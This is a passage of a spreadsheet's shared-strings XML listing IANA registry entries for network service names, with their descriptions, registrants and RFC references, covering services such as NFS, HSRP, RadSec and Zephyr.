  </si>
  <si>
    <t>childkey-notif</t>
  </si>
  <si>
    <t>ChildKey Notification</t>
  </si>
  <si>
    <t>childkey-ctrl</t>
  </si>
  <si>
    <t>ChildKey Control</t>
  </si>
  <si>
    <t>[Ivan_Berardinelli]</t>
  </si>
  <si>
    <t>elad</t>
  </si>
  <si>
    <t>ELAD Protocol</t>
  </si>
  <si>
    <t>[Franco_Milan]</t>
  </si>
  <si>
    <t>o2server-port</t>
  </si>
  <si>
    <t>O2Server Port</t>
  </si>
  <si>
    <t>[Tim_Howard]</t>
  </si>
  <si>
    <t>Microsoft (unoffically) using 1895</t>
  </si>
  <si>
    <t>b-novative-ls</t>
  </si>
  <si>
    <t>b-novative license server</t>
  </si>
  <si>
    <t>[Matthias_Riese]</t>
  </si>
  <si>
    <t>metaagent</t>
  </si>
  <si>
    <t>MetaAgent</t>
  </si>
  <si>
    <t>[Marie_France_Dubreui]</t>
  </si>
  <si>
    <t>cymtec-port</t>
  </si>
  <si>
    <t>Cymtec secure management</t>
  </si>
  <si>
    <t>[Michael_Mester]</t>
  </si>
  <si>
    <t>mc2studios</t>
  </si>
  <si>
    <t>MC2Studios</t>
  </si>
  <si>
    <t>[Michael_Coon]</t>
  </si>
  <si>
    <t>ssdp</t>
  </si>
  <si>
    <t>SSDP</t>
  </si>
  <si>
    <t>[UPnP_Forum]</t>
  </si>
  <si>
    <t>fjicl-tep-a</t>
  </si>
  <si>
    <t>Fujitsu ICL Terminal Emulator Program A</t>
  </si>
  <si>
    <t>fjicl-tep-b</t>
  </si>
  <si>
    <t>Fujitsu ICL Terminal Emulator Program B</t>
  </si>
  <si>
    <t>linkname</t>
  </si>
  <si>
    <t>Local Link Name Resolution</t>
  </si>
  <si>
    <t>[Dan_Harrington]</t>
  </si>
  <si>
    <t>fjicl-tep-c</t>
  </si>
  <si>
    <t>Fujitsu ICL Terminal Emulator Program C</t>
  </si>
  <si>
    <t>sugp</t>
  </si>
  <si>
    <t>Secure UP.Link Gateway Protocol</t>
  </si>
  <si>
    <t>[Peter_King]</t>
  </si>
  <si>
    <t>tpmd</t>
  </si>
  <si>
    <t>TPortMapperReq</t>
  </si>
  <si>
    <t>[Sheila_Devins]</t>
  </si>
  <si>
    <t>intrastar</t>
  </si>
  <si>
    <t>IntraSTAR</t>
  </si>
  <si>
    <t>[Peter_Schoenberger]</t>
  </si>
  <si>
    <t>dawn</t>
  </si>
  <si>
    <t>Dawn</t>
  </si>
  <si>
    <t>[Michael_Crawford_2]</t>
  </si>
  <si>
    <t>global-wlink</t>
  </si>
  <si>
    <t>Global World Link</t>
  </si>
  <si>
    <t>ultrabac</t>
  </si>
  <si>
    <t>UltraBac Software communications port</t>
  </si>
  <si>
    <t>[Paul_Bunn]</t>
  </si>
  <si>
    <t>mtp</t>
  </si>
  <si>
    <t>Starlight Networks Multimedia Transport Protocol</t>
  </si>
  <si>
    <t>[Bruce_Lieberman]</t>
  </si>
  <si>
    <t>rhp-iibp</t>
  </si>
  <si>
    <t>[George_Nachman][Tom_Lake]</t>
  </si>
  <si>
    <t>armadp</t>
  </si>
  <si>
    <t>[Kevin_Welton]</t>
  </si>
  <si>
    <t>elm-momentum</t>
  </si>
  <si>
    <t>Elm-Momentum</t>
  </si>
  <si>
    <t>[Willie_Wu]</t>
  </si>
  <si>
    <t>facelink</t>
  </si>
  <si>
    <t>FACELINK</t>
  </si>
  <si>
    <t>[J_H_Hermans]</t>
  </si>
  <si>
    <t>persona</t>
  </si>
  <si>
    <t>Persoft Persona</t>
  </si>
  <si>
    <t>[Tom_Spidell]</t>
  </si>
  <si>
    <t>noagent</t>
  </si>
  <si>
    <t>nOAgent</t>
  </si>
  <si>
    <t>[Martin_Bestmann]</t>
  </si>
  <si>
    <t>can-nds</t>
  </si>
  <si>
    <t>IBM Tivole Directory Service - NDS</t>
  </si>
  <si>
    <t>can-dch</t>
  </si>
  <si>
    <t>IBM Tivoli Directory Service - DCH</t>
  </si>
  <si>
    <t>can-ferret</t>
  </si>
  <si>
    <t>IBM Tivoli Directory Service - FERRET</t>
  </si>
  <si>
    <t>[Nic_Catrambone]</t>
  </si>
  <si>
    <t>noadmin</t>
  </si>
  <si>
    <t>NoAdmin</t>
  </si>
  <si>
    <t>tapestry</t>
  </si>
  <si>
    <t>Tapestry</t>
  </si>
  <si>
    <t>[Ken_Oliver]</t>
  </si>
  <si>
    <t>spice</t>
  </si>
  <si>
    <t>SPICE</t>
  </si>
  <si>
    <t>[Nicholas_Chua]</t>
  </si>
  <si>
    <t>xiip</t>
  </si>
  <si>
    <t>XIIP</t>
  </si>
  <si>
    <t>[Alain_Robert_2]</t>
  </si>
  <si>
    <t>discovery-port</t>
  </si>
  <si>
    <t>Surrogate Discovery Port</t>
  </si>
  <si>
    <t>[Keith_Thompson]</t>
  </si>
  <si>
    <t>egs</t>
  </si>
  <si>
    <t>Evolution Game Server</t>
  </si>
  <si>
    <t>[Simon_Butcher]</t>
  </si>
  <si>
    <t>videte-cipc</t>
  </si>
  <si>
    <t>Videte CIPC Port</t>
  </si>
  <si>
    <t>[Videte_IT]</t>
  </si>
  <si>
    <t>emsd-port</t>
  </si>
  <si>
    <t>Expnd Maui Srvr Dscovr</t>
  </si>
  <si>
    <t>[Edo_Yahav]</t>
  </si>
  <si>
    <t>bandwiz-system</t>
  </si>
  <si>
    <t>Bandwiz System - Server</t>
  </si>
  <si>
    <t>[Joseph_Weihs]</t>
  </si>
  <si>
    <t>driveappserver</t>
  </si>
  <si>
    <t>Drive AppServer</t>
  </si>
  <si>
    <t>[Andrew_Johnson]</t>
  </si>
  <si>
    <t>amdsched</t>
  </si>
  <si>
    <t>AMD SCHED</t>
  </si>
  <si>
    <t>[Michael_Walsh]</t>
  </si>
  <si>
    <t>ctt-broker</t>
  </si>
  <si>
    <t>CTT Broker</t>
  </si>
  <si>
    <t>[Jens_Edlund]</t>
  </si>
  <si>
    <t>xmapi</t>
  </si>
  <si>
    <t>IBM LM MT Agent</t>
  </si>
  <si>
    <t>xaapi</t>
  </si>
  <si>
    <t>IBM LM Appl Agent</t>
  </si>
  <si>
    <t>[Helga_Wolin]</t>
  </si>
  <si>
    <t>macromedia-fcs</t>
  </si>
  <si>
    <t>Macromedia Flash Communications Server MX</t>
  </si>
  <si>
    <t>[Pritham_Shetty]</t>
  </si>
  <si>
    <t>Macromedia Flash Communications server MX</t>
  </si>
  <si>
    <t>jetcmeserver</t>
  </si>
  <si>
    <t>JetCmeServer Server Port</t>
  </si>
  <si>
    <t>jwserver</t>
  </si>
  <si>
    <t>JetVWay Server Port</t>
  </si>
  <si>
    <t>jwclient</t>
  </si>
  <si>
    <t>JetVWay Client Port</t>
  </si>
  <si>
    <t>jvserver</t>
  </si>
  <si>
    <t>JetVision Server Port</t>
  </si>
  <si>
    <t>jvclient</t>
  </si>
  <si>
    <t>JetVision Client Port</t>
  </si>
  <si>
    <t>[Stephen_Tsun]</t>
  </si>
  <si>
    <t>dic-aida</t>
  </si>
  <si>
    <t>DIC-Aida</t>
  </si>
  <si>
    <t>[Frans_S_C_Witte]</t>
  </si>
  <si>
    <t>res</t>
  </si>
  <si>
    <t>Real Enterprise Service</t>
  </si>
  <si>
    <t>[Bob_Janssen]</t>
  </si>
  <si>
    <t>beeyond-media</t>
  </si>
  <si>
    <t>Beeyond Media</t>
  </si>
  <si>
    <t>[Bob_Deblier]</t>
  </si>
  <si>
    <t>close-combat</t>
  </si>
  <si>
    <t>[David_Hua]</t>
  </si>
  <si>
    <t>dialogic-elmd</t>
  </si>
  <si>
    <t>[Roger_Kay]</t>
  </si>
  <si>
    <t>tekpls</t>
  </si>
  <si>
    <t>[Brian_Abramson_2]</t>
  </si>
  <si>
    <t>sentinelsrm</t>
  </si>
  <si>
    <t>SentinelSRM</t>
  </si>
  <si>
    <t>[Michael_Zunke_2]</t>
  </si>
  <si>
    <t>Unauthorized Use Known on port 1947</t>
  </si>
  <si>
    <t>eye2eye</t>
  </si>
  <si>
    <t>[Trevor_Bell]</t>
  </si>
  <si>
    <t>ismaeasdaqlive</t>
  </si>
  <si>
    <t>ISMA Easdaq Live</t>
  </si>
  <si>
    <t>[Stephen_Dunne]</t>
  </si>
  <si>
    <t>ismaeasdaqtest</t>
  </si>
  <si>
    <t>ISMA Easdaq Test</t>
  </si>
  <si>
    <t>bcs-lmserver</t>
  </si>
  <si>
    <t>mpnjsc</t>
  </si>
  <si>
    <t>[Takenori_Miyahara]</t>
  </si>
  <si>
    <t>rapidbase</t>
  </si>
  <si>
    <t>Rapid Base</t>
  </si>
  <si>
    <t>[Antoni_Wolski]</t>
  </si>
  <si>
    <t>abr-api</t>
  </si>
  <si>
    <t>ABR-API (diskbridge)</t>
  </si>
  <si>
    <t>abr-secure</t>
  </si>
  <si>
    <t>ABR-Secure Data (diskbridge)</t>
  </si>
  <si>
    <t>[Graham_Wooden]</t>
  </si>
  <si>
    <t>vrtl-vmf-ds</t>
  </si>
  <si>
    <t>Vertel VMF DS</t>
  </si>
  <si>
    <t>[Alan_Akahoshi]</t>
  </si>
  <si>
    <t>unix-status</t>
  </si>
  <si>
    <t>[Thomas_Erskine]</t>
  </si>
  <si>
    <t>dxadmind</t>
  </si>
  <si>
    <t>CA Administration Daemon</t>
  </si>
  <si>
    <t>[John_Birrell]</t>
  </si>
  <si>
    <t>simp-all</t>
  </si>
  <si>
    <t>SIMP Channel</t>
  </si>
  <si>
    <t>[Tim_Hunnewell]</t>
  </si>
  <si>
    <t>nasmanager</t>
  </si>
  <si>
    <t>Merit DAC NASmanager</t>
  </si>
  <si>
    <t>[Richard_S_Conto]</t>
  </si>
  <si>
    <t>bts-appserver</t>
  </si>
  <si>
    <t>BTS APPSERVER</t>
  </si>
  <si>
    <t>[Carl_Obsorn]</t>
  </si>
  <si>
    <t>biap-mp</t>
  </si>
  <si>
    <t>BIAP-MP</t>
  </si>
  <si>
    <t>[Louis_Slothouber]</t>
  </si>
  <si>
    <t>webmachine</t>
  </si>
  <si>
    <t>WebMachine</t>
  </si>
  <si>
    <t>[Tim_Jowers]</t>
  </si>
  <si>
    <t>solid-e-engine</t>
  </si>
  <si>
    <t>SOLID E ENGINE</t>
  </si>
  <si>
    <t>[Ari_Valtanen]</t>
  </si>
  <si>
    <t>tivoli-npm</t>
  </si>
  <si>
    <t>Tivoli NPM</t>
  </si>
  <si>
    <t>[Ivana_Cuozzo]</t>
  </si>
  <si>
    <t>slush</t>
  </si>
  <si>
    <t>Slush</t>
  </si>
  <si>
    <t>[Damien_Miller]</t>
  </si>
  <si>
    <t>sns-quote</t>
  </si>
  <si>
    <t>SNS Quote</t>
  </si>
  <si>
    <t>[Robert_Ellman]</t>
  </si>
  <si>
    <t>lipsinc</t>
  </si>
  <si>
    <t>LIPSinc</t>
  </si>
  <si>
    <t>lipsinc1</t>
  </si>
  <si>
    <t>LIPSinc 1</t>
  </si>
  <si>
    <t>[Robert_Armington]</t>
  </si>
  <si>
    <t>netop-rc</t>
  </si>
  <si>
    <t>NetOp Remote Control</t>
  </si>
  <si>
    <t>netop-school</t>
  </si>
  <si>
    <t>NetOp School</t>
  </si>
  <si>
    <t>[NetOp_Technical_Supp]</t>
  </si>
  <si>
    <t>intersys-cache</t>
  </si>
  <si>
    <t>Cache</t>
  </si>
  <si>
    <t>[Mark_Hanson]</t>
  </si>
  <si>
    <t>dlsrap</t>
  </si>
  <si>
    <t>Data Link Switching Remote Access Protocol</t>
  </si>
  <si>
    <t>[Steve_T_Chiang]</t>
  </si>
  <si>
    <t>drp</t>
  </si>
  <si>
    <t>DRP</t>
  </si>
  <si>
    <t>[Richard_Alan_Johnson]</t>
  </si>
  <si>
    <t>tcoflashagent</t>
  </si>
  <si>
    <t>TCO Flash Agent</t>
  </si>
  <si>
    <t>tcoregagent</t>
  </si>
  <si>
    <t>TCO Reg Agent</t>
  </si>
  <si>
    <t>tcoaddressbook</t>
  </si>
  <si>
    <t>TCO Address Book</t>
  </si>
  <si>
    <t>[Allan_Panitch]</t>
  </si>
  <si>
    <t>unisql</t>
  </si>
  <si>
    <t>UniSQL</t>
  </si>
  <si>
    <t>unisql-java</t>
  </si>
  <si>
    <t>UniSQL Java</t>
  </si>
  <si>
    <t>[Keith_Yarbrough]</t>
  </si>
  <si>
    <t>pearldoc-xact</t>
  </si>
  <si>
    <t>PearlDoc XACT</t>
  </si>
  <si>
    <t>[Chris_Vertonghen]</t>
  </si>
  <si>
    <t>p2pq</t>
  </si>
  <si>
    <t>p2pQ</t>
  </si>
  <si>
    <t>[Warren_Alexander]</t>
  </si>
  <si>
    <t>estamp</t>
  </si>
  <si>
    <t>Evidentiary Timestamp</t>
  </si>
  <si>
    <t>[Todd_Glassey]</t>
  </si>
  <si>
    <t>lhtp</t>
  </si>
  <si>
    <t>Loophole Test Protocol</t>
  </si>
  <si>
    <t>[Kade_Hansson]</t>
  </si>
  <si>
    <t>bb</t>
  </si>
  <si>
    <t>BB</t>
  </si>
  <si>
    <t>[Sean_MacGuire]</t>
  </si>
  <si>
    <t>hsrp</t>
  </si>
  <si>
    <t>Hot Standby Router Protocol</t>
  </si>
  <si>
    <t>[RFC2281]</t>
  </si>
  <si>
    <t>licensedaemon</t>
  </si>
  <si>
    <t>cisco license management</t>
  </si>
  <si>
    <t>tr-rsrb-p1</t>
  </si>
  <si>
    <t>cisco RSRB Priority 1 port</t>
  </si>
  <si>
    <t>tr-rsrb-p2</t>
  </si>
  <si>
    <t>cisco RSRB Priority 2 port</t>
  </si>
  <si>
    <t>tr-rsrb-p3</t>
  </si>
  <si>
    <t>cisco RSRB Priority 3 port</t>
  </si>
  <si>
    <t>mshnet</t>
  </si>
  <si>
    <t>MHSnet system</t>
  </si>
  <si>
    <t>[Bob_Kummerfeld]</t>
  </si>
  <si>
    <t>stun-p1</t>
  </si>
  <si>
    <t>cisco STUN Priority 1 port</t>
  </si>
  <si>
    <t>stun-p2</t>
  </si>
  <si>
    <t>cisco STUN Priority 2 port</t>
  </si>
  <si>
    <t>stun-p3</t>
  </si>
  <si>
    <t>cisco STUN Priority 3 port</t>
  </si>
  <si>
    <t>ipsendmsg</t>
  </si>
  <si>
    <t>IPsendmsg</t>
  </si>
  <si>
    <t>snmp-tcp-port</t>
  </si>
  <si>
    <t>cisco SNMP TCP port</t>
  </si>
  <si>
    <t>stun-port</t>
  </si>
  <si>
    <t>cisco serial tunnel port</t>
  </si>
  <si>
    <t>perf-port</t>
  </si>
  <si>
    <t>cisco perf port</t>
  </si>
  <si>
    <t>tr-rsrb-port</t>
  </si>
  <si>
    <t>cisco Remote SRB port</t>
  </si>
  <si>
    <t>gdp-port</t>
  </si>
  <si>
    <t>cisco Gateway Discovery Protocol</t>
  </si>
  <si>
    <t>x25-svc-port</t>
  </si>
  <si>
    <t>cisco X.25 service (XOT)</t>
  </si>
  <si>
    <t>tcp-id-port</t>
  </si>
  <si>
    <t>cisco identification port</t>
  </si>
  <si>
    <t>cisco-sccp</t>
  </si>
  <si>
    <t>Cisco SCCP</t>
  </si>
  <si>
    <t>[Dan_Wing]</t>
  </si>
  <si>
    <t>Cisco SCCp</t>
  </si>
  <si>
    <t>dc</t>
  </si>
  <si>
    <t>wizard</t>
  </si>
  <si>
    <t>curry</t>
  </si>
  <si>
    <t>globe</t>
  </si>
  <si>
    <t>brutus</t>
  </si>
  <si>
    <t>Brutus Server</t>
  </si>
  <si>
    <t>[Johannes_Skov_Frands]</t>
  </si>
  <si>
    <t>mailbox</t>
  </si>
  <si>
    <t>emce</t>
  </si>
  <si>
    <t>CCWS mm conf</t>
  </si>
  <si>
    <t>berknet</t>
  </si>
  <si>
    <t>invokator</t>
  </si>
  <si>
    <t>raid-cd</t>
  </si>
  <si>
    <t>raid</t>
  </si>
  <si>
    <t>dectalk</t>
  </si>
  <si>
    <t>raid-am</t>
  </si>
  <si>
    <t>conf</t>
  </si>
  <si>
    <t>terminaldb</t>
  </si>
  <si>
    <t>news</t>
  </si>
  <si>
    <t>whosockami</t>
  </si>
  <si>
    <t>search</t>
  </si>
  <si>
    <t>pipe-server</t>
  </si>
  <si>
    <t>IANA assigned this well-formed service name as a replacement for "pipe_server".</t>
  </si>
  <si>
    <t>pipe_server</t>
  </si>
  <si>
    <t>This entry is an alias to "pipe-server".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>raid-cc</t>
  </si>
  <si>
    <t>servserv</t>
  </si>
  <si>
    <t>ttyinfo</t>
  </si>
  <si>
    <t>raid-ac</t>
  </si>
  <si>
    <t>troff</t>
  </si>
  <si>
    <t>raid-sf</t>
  </si>
  <si>
    <t>cypress</t>
  </si>
  <si>
    <t>raid-cs</t>
  </si>
  <si>
    <t>bootserver</t>
  </si>
  <si>
    <t>cypress-stat</t>
  </si>
  <si>
    <t>bootclient</t>
  </si>
  <si>
    <t>rellpack</t>
  </si>
  <si>
    <t>about</t>
  </si>
  <si>
    <t>xinupageserver</t>
  </si>
  <si>
    <t>servexec</t>
  </si>
  <si>
    <t>xinuexpansion1</t>
  </si>
  <si>
    <t>down</t>
  </si>
  <si>
    <t>xinuexpansion2</t>
  </si>
  <si>
    <t>xinuexpansion3</t>
  </si>
  <si>
    <t>xinuexpansion4</t>
  </si>
  <si>
    <t>ellpack</t>
  </si>
  <si>
    <t>xribs</t>
  </si>
  <si>
    <t>scrabble</t>
  </si>
  <si>
    <t>shadowserver</t>
  </si>
  <si>
    <t>submitserver</t>
  </si>
  <si>
    <t>hsrpv6</t>
  </si>
  <si>
    <t>Hot Standby Router Protocol IPv6</t>
  </si>
  <si>
    <t>[Ian_Wilson]</t>
  </si>
  <si>
    <t>device2</t>
  </si>
  <si>
    <t>mobrien-chat</t>
  </si>
  <si>
    <t>[Mike_O_Brien]</t>
  </si>
  <si>
    <t>blackboard</t>
  </si>
  <si>
    <t>glogger</t>
  </si>
  <si>
    <t>scoremgr</t>
  </si>
  <si>
    <t>imsldoc</t>
  </si>
  <si>
    <t>e-dpnet</t>
  </si>
  <si>
    <t>Ethernet WS DP network</t>
  </si>
  <si>
    <t>[Peter_Kaever]</t>
  </si>
  <si>
    <t>applus</t>
  </si>
  <si>
    <t>APplus Application Server</t>
  </si>
  <si>
    <t>[Thomas_Boerkel]</t>
  </si>
  <si>
    <t>Formerly was P2plus Application Server</t>
  </si>
  <si>
    <t>objectmanager</t>
  </si>
  <si>
    <t>prizma</t>
  </si>
  <si>
    <t>Prizma Monitoring Service</t>
  </si>
  <si>
    <t>[Dotan_Ofek]</t>
  </si>
  <si>
    <t>lam</t>
  </si>
  <si>
    <t>interbase</t>
  </si>
  <si>
    <t>isis</t>
  </si>
  <si>
    <t>isis-bcast</t>
  </si>
  <si>
    <t>rimsl</t>
  </si>
  <si>
    <t>cdfunc</t>
  </si>
  <si>
    <t>sdfunc</t>
  </si>
  <si>
    <t>dls-monitor</t>
  </si>
  <si>
    <t>shilp</t>
  </si>
  <si>
    <t>&lt;== NOTE Conflict on 2049 !</t>
  </si>
  <si>
    <t>nfs</t>
  </si>
  <si>
    <t>Network File System - Sun Microsystems</t>
  </si>
  <si>
    <t>[Brent_Callaghan]</t>
  </si>
  <si>
    <t>Defined TXT keys: path=&lt;path to mount point&gt;</t>
  </si>
  <si>
    <t>Network File System</t>
  </si>
  <si>
    <t>[RFC5665]</t>
  </si>
  <si>
    <t>av-emb-config</t>
  </si>
  <si>
    <t>Avaya EMB Config Port</t>
  </si>
  <si>
    <t>[John_Yeager]</t>
  </si>
  <si>
    <t>epnsdp</t>
  </si>
  <si>
    <t>EPNSDP</t>
  </si>
  <si>
    <t>[Hiroyasu_Ogata]</t>
  </si>
  <si>
    <t>clearvisn</t>
  </si>
  <si>
    <t>clearVisn Services Port</t>
  </si>
  <si>
    <t>[Dave_Lyons]</t>
  </si>
  <si>
    <t>lot105-ds-upd</t>
  </si>
  <si>
    <t>Lot105 DSuper Updates</t>
  </si>
  <si>
    <t>[Piers_Scannell]</t>
  </si>
  <si>
    <t>weblogin</t>
  </si>
  <si>
    <t>Weblogin Port</t>
  </si>
  <si>
    <t>[Diego_Saravia]</t>
  </si>
  <si>
    <t>iop</t>
  </si>
  <si>
    <t>Iliad-Odyssey Protocol</t>
  </si>
  <si>
    <t>omnisky</t>
  </si>
  <si>
    <t>OmniSky Port</t>
  </si>
  <si>
    <t>[Oren_Hurvitz]</t>
  </si>
  <si>
    <t>rich-cp</t>
  </si>
  <si>
    <t>Rich Content Protocol</t>
  </si>
  <si>
    <t>[Ronen_Vainish]</t>
  </si>
  <si>
    <t>newwavesearch</t>
  </si>
  <si>
    <t>NewWaveSearchables RMI</t>
  </si>
  <si>
    <t>[Thomas_Kerkau]</t>
  </si>
  <si>
    <t>bmc-messaging</t>
  </si>
  <si>
    <t>BMC Messaging Service</t>
  </si>
  <si>
    <t>teleniumdaemon</t>
  </si>
  <si>
    <t>Telenium Daemon IF</t>
  </si>
  <si>
    <t>[Nick_Woronuk]</t>
  </si>
  <si>
    <t>netmount</t>
  </si>
  <si>
    <t>NetMount</t>
  </si>
  <si>
    <t>[Alex_Oberlander]</t>
  </si>
  <si>
    <t>icg-swp</t>
  </si>
  <si>
    <t>ICG SWP Port</t>
  </si>
  <si>
    <t>icg-bridge</t>
  </si>
  <si>
    <t>ICG Bridge Port</t>
  </si>
  <si>
    <t>icg-iprelay</t>
  </si>
  <si>
    <t>ICG IP Relay Port</t>
  </si>
  <si>
    <t>[Steve_Quintana]</t>
  </si>
  <si>
    <t>dlsrpn</t>
  </si>
  <si>
    <t>Data Link Switch Read Port Number</t>
  </si>
  <si>
    <t>[Amir_Peless]</t>
  </si>
  <si>
    <t>aura</t>
  </si>
  <si>
    <t>AVM USB Remote Architecture</t>
  </si>
  <si>
    <t>dlswpn</t>
  </si>
  <si>
    <t>Data Link Switch Write Port Number</t>
  </si>
  <si>
    <t>avauthsrvprtcl</t>
  </si>
  <si>
    <t>Avocent AuthSrv Protocol</t>
  </si>
  <si>
    <t>[Steven_W_Clark_2]</t>
  </si>
  <si>
    <t>event-port</t>
  </si>
  <si>
    <t>HTTP Event Port</t>
  </si>
  <si>
    <t>[Larry_Emlich]</t>
  </si>
  <si>
    <t>ah-esp-encap</t>
  </si>
  <si>
    <t>AH and ESP Encapsulated in UDP packet</t>
  </si>
  <si>
    <t>[Amy_Weaver]</t>
  </si>
  <si>
    <t>acp-port</t>
  </si>
  <si>
    <t>Axon Control Protocol</t>
  </si>
  <si>
    <t>[Christiaan_Simons]</t>
  </si>
  <si>
    <t>msync</t>
  </si>
  <si>
    <t>GlobeCast mSync</t>
  </si>
  <si>
    <t>[Piers_Scannell_2]</t>
  </si>
  <si>
    <t>gxs-data-port</t>
  </si>
  <si>
    <t>DataReel Database Socket</t>
  </si>
  <si>
    <t>[Douglas_M_Gaer]</t>
  </si>
  <si>
    <t>vrtl-vmf-sa</t>
  </si>
  <si>
    <t>Vertel VMF SA</t>
  </si>
  <si>
    <t>newlixengine</t>
  </si>
  <si>
    <t>Newlix ServerWare Engine</t>
  </si>
  <si>
    <t>newlixconfig</t>
  </si>
  <si>
    <t>Newlix JSPConfig</t>
  </si>
  <si>
    <t>[Jean_Serge_Gagnon]</t>
  </si>
  <si>
    <t>tsrmagt</t>
  </si>
  <si>
    <t>Old Tivoli Storage Manager</t>
  </si>
  <si>
    <t>tpcsrvr</t>
  </si>
  <si>
    <t>IBM Total Productivity Center Server</t>
  </si>
  <si>
    <t>[Justin_R_Bendich]</t>
  </si>
  <si>
    <t>idware-router</t>
  </si>
  <si>
    <t>IDWARE Router Port</t>
  </si>
  <si>
    <t>[Zdenek_Kolba]</t>
  </si>
  <si>
    <t>autodesk-nlm</t>
  </si>
  <si>
    <t>Autodesk NLM (FLEXlm)</t>
  </si>
  <si>
    <t>[Greg_Suppes]</t>
  </si>
  <si>
    <t>kme-trap-port</t>
  </si>
  <si>
    <t>KME PRINTER TRAP PORT</t>
  </si>
  <si>
    <t>[Masakatsu_Matsuo]</t>
  </si>
  <si>
    <t>infowave</t>
  </si>
  <si>
    <t>Infowave Mobility Server</t>
  </si>
  <si>
    <t>[Kaz_Kylheku]</t>
  </si>
  <si>
    <t>radsec</t>
  </si>
  <si>
    <t>Secure Radius Service</t>
  </si>
  <si>
    <t>2005-05</t>
  </si>
  <si>
    <t>[RFC6614]</t>
  </si>
  <si>
    <t>The TCP port 2083 was already
      previously assigned by IANA for "RadSec", an early implementation
      of RADIUS/TLS, prior to issuance of this RFC.  This early
      implementation can be configured to be compatible to RADIUS/TLS as
      specified by the IETF.  See [RFC6614],
      Appendix A for details.</t>
  </si>
  <si>
    <t>[RFC7360]</t>
  </si>
  <si>
    <t>The UDP port 2083 was already previously assigned by IANA for 
      "RadSec", an early implementation of RADIUS/TLS, prior to issuance of this 
      RFC.</t>
  </si>
  <si>
    <t>sunclustergeo</t>
  </si>
  <si>
    <t>SunCluster Geographic</t>
  </si>
  <si>
    <t>[Oracle_2]</t>
  </si>
  <si>
    <t>[Steve_McKinty]</t>
  </si>
  <si>
    <t>ada-cip</t>
  </si>
  <si>
    <t>ADA Control</t>
  </si>
  <si>
    <t>[Eugene_Frenkel]</t>
  </si>
  <si>
    <t>gnunet</t>
  </si>
  <si>
    <t>GNUnet</t>
  </si>
  <si>
    <t>[Christian_Grothoff]</t>
  </si>
  <si>
    <t>2002-10</t>
  </si>
  <si>
    <t>eli</t>
  </si>
  <si>
    <t>ELI - Event Logging Integration</t>
  </si>
  <si>
    <t>[Maya_Zimerman]</t>
  </si>
  <si>
    <t>ip-blf</t>
  </si>
  <si>
    <t>IP Busy Lamp Field</t>
  </si>
  <si>
    <t>[Jeffrey_Szczepanski]</t>
  </si>
  <si>
    <t>2005-02</t>
  </si>
  <si>
    <t>sep</t>
  </si>
  <si>
    <t>Security Encapsulation Protocol - SEP</t>
  </si>
  <si>
    <t>lrp</t>
  </si>
  <si>
    <t>Load Report Protocol</t>
  </si>
  <si>
    <t>prp</t>
  </si>
  <si>
    <t>PRP</t>
  </si>
  <si>
    <t>descent3</t>
  </si>
  <si>
    <t>Descent 3</t>
  </si>
  <si>
    <t>[Kevin_Bentley]</t>
  </si>
  <si>
    <t>nbx-cc</t>
  </si>
  <si>
    <t>NBX CC</t>
  </si>
  <si>
    <t>nbx-au</t>
  </si>
  <si>
    <t>NBX AU</t>
  </si>
  <si>
    <t>nbx-ser</t>
  </si>
  <si>
    <t>NBX SER</t>
  </si>
  <si>
    <t>nbx-dir</t>
  </si>
  <si>
    <t>NBX DIR</t>
  </si>
  <si>
    <t>[Henry_Houh]</t>
  </si>
  <si>
    <t>jetformpreview</t>
  </si>
  <si>
    <t>Jet Form Preview</t>
  </si>
  <si>
    <t>[Zygmunt_Wiercioch]</t>
  </si>
  <si>
    <t>dialog-port</t>
  </si>
  <si>
    <t>Dialog Port</t>
  </si>
  <si>
    <t>[Joseph_Mathew]</t>
  </si>
  <si>
    <t>h2250-annex-g</t>
  </si>
  <si>
    <t>H.225.0 Annex G Signalling</t>
  </si>
  <si>
    <t>amiganetfs</t>
  </si>
  <si>
    <t>Amiga Network Filesystem</t>
  </si>
  <si>
    <t>[Rudi_Chiarito]</t>
  </si>
  <si>
    <t>rtcm-sc104</t>
  </si>
  <si>
    <t>[Wolfgang_Rupprecht]</t>
  </si>
  <si>
    <t>zephyr-srv</t>
  </si>
  <si>
    <t>Zephyr server</t>
  </si>
  <si>
    <t>zephyr-clt</t>
  </si>
  <si>
    <t>Zephyr serv-hm connection</t>
  </si>
  <si>
    <t>zephyr-hm</t>
  </si>
  <si>
    <t>Zephyr hostmanager</t>
  </si>
  <si>
    <t>[Greg_Hudson]</t>
  </si>
  <si>
    <t>minipay</t>
  </si>
  <si>
    <t>MiniPay</t>
  </si>
  <si>
    <t>[Amir_Herzberg]</t>
  </si>
  <si>
    <t>mzap</t>
  </si>
  <si>
    <t>MZAP</t>
  </si>
  <si>
    <t>[Dave_Thaler_2]</t>
  </si>
  <si>
    <t>bintec-admin</t>
  </si>
  <si>
    <t>BinTec Admin</t>
  </si>
  <si>
    <t>[Thomas_Schmidt]</t>
  </si>
  <si>
    <t>comcam</t>
  </si>
  <si>
    <t>Comcam</t>
  </si>
  <si>
    <t>[Don_Gilbreath]</t>
  </si>
  <si>
    <t>ergolight</t>
  </si>
  <si>
    <t>Ergolight</t>
  </si>
  <si>
    <t>[Jindra_Ryvola]</t>
  </si>
  <si>
    <t>umsp</t>
  </si>
  <si>
    <t>UMSP</t>
  </si>
  <si>
    <t>[Alexander_Bogdanov_2]</t>
  </si>
  <si>
    <t>dsatp</t>
  </si>
  <si>
    <t>OPNET Dynamic Sampling Agent Transaction Protocol</t>
  </si>
  <si>
    <t>[OPNET_Technologies_Inc]</t>
  </si>
  <si>
    <t>[Edward_Macomber]</t>
  </si>
  <si>
    <t>idonix-metanet</t>
  </si>
  <si>
    <t>Idonix MetaNet</t>
  </si>
  <si>
    <t>[Paul_Harrison]</t>
  </si>
  <si>
    <t>hsl-storm</t>
  </si>
  <si>
    <t>HSL StoRM</t>
  </si>
  <si>
    <t>[Jost_Faganel]</t>
  </si>
  <si>
    <t>ariascribe</t>
  </si>
  <si>
    <t>Classical Music Meta-Data Access and Enhancement</t>
  </si>
  <si>
    <t>[Aria_Scribe_Software_Ltd]</t>
  </si>
  <si>
    <t>[Michael_Levy]</t>
  </si>
  <si>
    <t>kdm</t>
  </si>
  <si>
    <t>Key Distribution Manager</t>
  </si>
  <si>
    <t>[Mike_Little]</t>
  </si>
  <si>
    <t>ccowcmr</t>
  </si>
  <si>
    <t>CCOWCMR</t>
  </si>
  <si>
    <t>[Mark_Morwood]</t>
  </si>
  <si>
    <t>mentaclient</t>
  </si>
  <si>
    <t>MENTACLIENT</t>
  </si>
  <si>
